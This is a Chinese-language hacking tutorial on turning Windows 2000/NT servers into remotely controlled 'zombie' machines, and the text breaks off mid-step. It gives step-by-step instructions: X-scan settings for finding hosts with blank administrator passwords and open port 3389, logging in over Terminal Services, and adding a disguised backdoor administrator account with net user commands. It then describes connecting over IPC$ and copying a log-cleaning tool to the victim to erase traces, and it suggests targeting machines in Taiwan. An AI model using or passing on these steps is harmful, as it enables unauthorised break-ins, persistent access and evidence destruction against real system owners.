肉鸡 教程.doc

肉鸡 教程 现在有输入法漏洞的机器已不多了，除非你遇见的是一个极不负责任的网管，呵呵！~这篇教程就是教你不用输入法漏洞就能用终端服务连接上开3389的机器，使它成为你的肉鸡。（下面的人要注意啊，不要搞国内的机器，我用来做示范的是台湾的机器，为何要用台湾的呢？等一下就知道啦）先做一下准备活动，呵呵！何为准备活动？就是找到要用的工具呀。（操作系统要求win2000/NT) 一.X-scan-v1.0,强大的扫描工具，简单易用，没有IP限制，呵呵？想到什么了？ 二.WIN2000终端服务客户端（没这个怎么叫3389肉鸡呢？） 三.CleanIISLog.exe,榕哥的清日志的好东东！^o^(又买广告呢） 四.SQLEXEC.EXE （以上软件均在本站有下载) 好！武器都准备好了就动手吧！ 一。运行X-scan-v1.0工具包中的xscan_gui.exe，这是一个图形界面的扫描器，在“扫描设置”下选择“标准端口”；“NT弱口令用户”；“SQL-SERVER默认帐户”这三项，“运行参数”下填上你要扫描的IP地址段，例如：211.**.1.1-211.**.20.255（选的范围不要太大，要不很长时间都扫不完，也不要太少，少了可能找不到肉鸡），尽量不要选下面的“使用代理服务器”，线程要看你的网速如何，快的可以填50线程，我一般是用50的！YEAH！~~在“扫描前先PING主机”打上钩，“X-SCANNER所在位置”用默认的.\xscan.exe就可以了。再来“其他设置”下，“配置文件”处是.\dat\config.ini，点击旁边的“读取设置”，看到这个面板的框框都有东西了，就表示设置好！回到开始时的“扫描设置”面板下，点击下方的“开始扫描”。见到一个DOS窗口出来了，扫描正式开始！^O^,去泡泡MM吧，天南地北的吹一通，呵呵，看到扫描全部完成了，和你的MM说拜拜咯，开工~！！ 看看扫描的报告，可能会很多的，一定要看清楚哦，要不肉鸡可能就这样给飞走啦。找找看，（主要是找有NT弱口令帐户又同时开了3389的机器）我就找到了一个例子：（不是真的哦，别照这个去试） 211.**.**.53: 【详细资料】 【主机摘要 -- 域名/主机名:快辣侥 操作系统:Windows NT 5.0】 NT弱口令帐户:1 开放端口:135,139,3389 看到了吗？NT弱口令帐户:1 开放端口:135,139,3389，！！！！！！！！！！ 好了，再点“详细资料”进去看看： 【NT弱口令用户】: Administrator: [空口令] 帐户类型：管理员(Administrator) 最后登录时间: GMT 错误口令次数: 0次 成功登录次数: 9次 用户ID: 0x000001f4, 组ID: 0 欢呼吧，！！！！！！！（如果看到“详细资料”里的帐户类型不是管理员的话，就找下一个吧，反正扫描报告多得很，总会找到一个的，我就试过扫描一次，就扫到了十多个这样的帐户，呵呵！~~） 知道了管理员的帐户是：Administrator，口令是空！到这时候，这台NT主机已差不多可以说是你的啦。 二.运行你的终端服务客户端，填上这个IP，按“连接”，等一下就看到了熟悉的WIN2000终端登陆界面，好，填上用户名：Administrator，口令不用填啦，按“确定”，等一下，哈哈！！！！！进去啦~~~~你会先看到一个叫你设定伺服器的画面，关掉，不要了。想干什么？首先我们为了防止管理员以后改了密码，我们先要给自己做一个管理员的帐户，点对方屏幕的开始--》程序--》附件--》命令提示符（这里的字有时是不同的，要看具体是什么系统，自己好好看看吧），依次输入： C:\net user owem lgg1234 /add（加入一个用户名为owem,密码：lgg1314的帐户） 指令執行成功。 C：\net localgroup administrators owem /add(把owem加入到管理员组） 指令執行成功。 好了！到这里你已增加了一个管理员了，以后就算他把Administrator的密码改了你也可以用owem这个帐户进去耍啦，建议你先用net user看看人家的管理组有多少人，人多的话就尽管加个号吧，人少的加号时就要找一个近似于对方的名字来迷惑管理员，哈哈~`够绝了吧！ 再来，在自己的命令提示符下依次输入： D:\hackernet use \\211.**.**.53\ipc$ lgg1314 /user:owem(用IPC管道连接上去） 命令成功完成。 D:\hackercopy CleanIISLog.exe \\211.**.**.53\c$(把CleanIISLog.exe拷到对方对方C盘下，有时会拒绝访问的，就拷到其他目录下吧） 已复制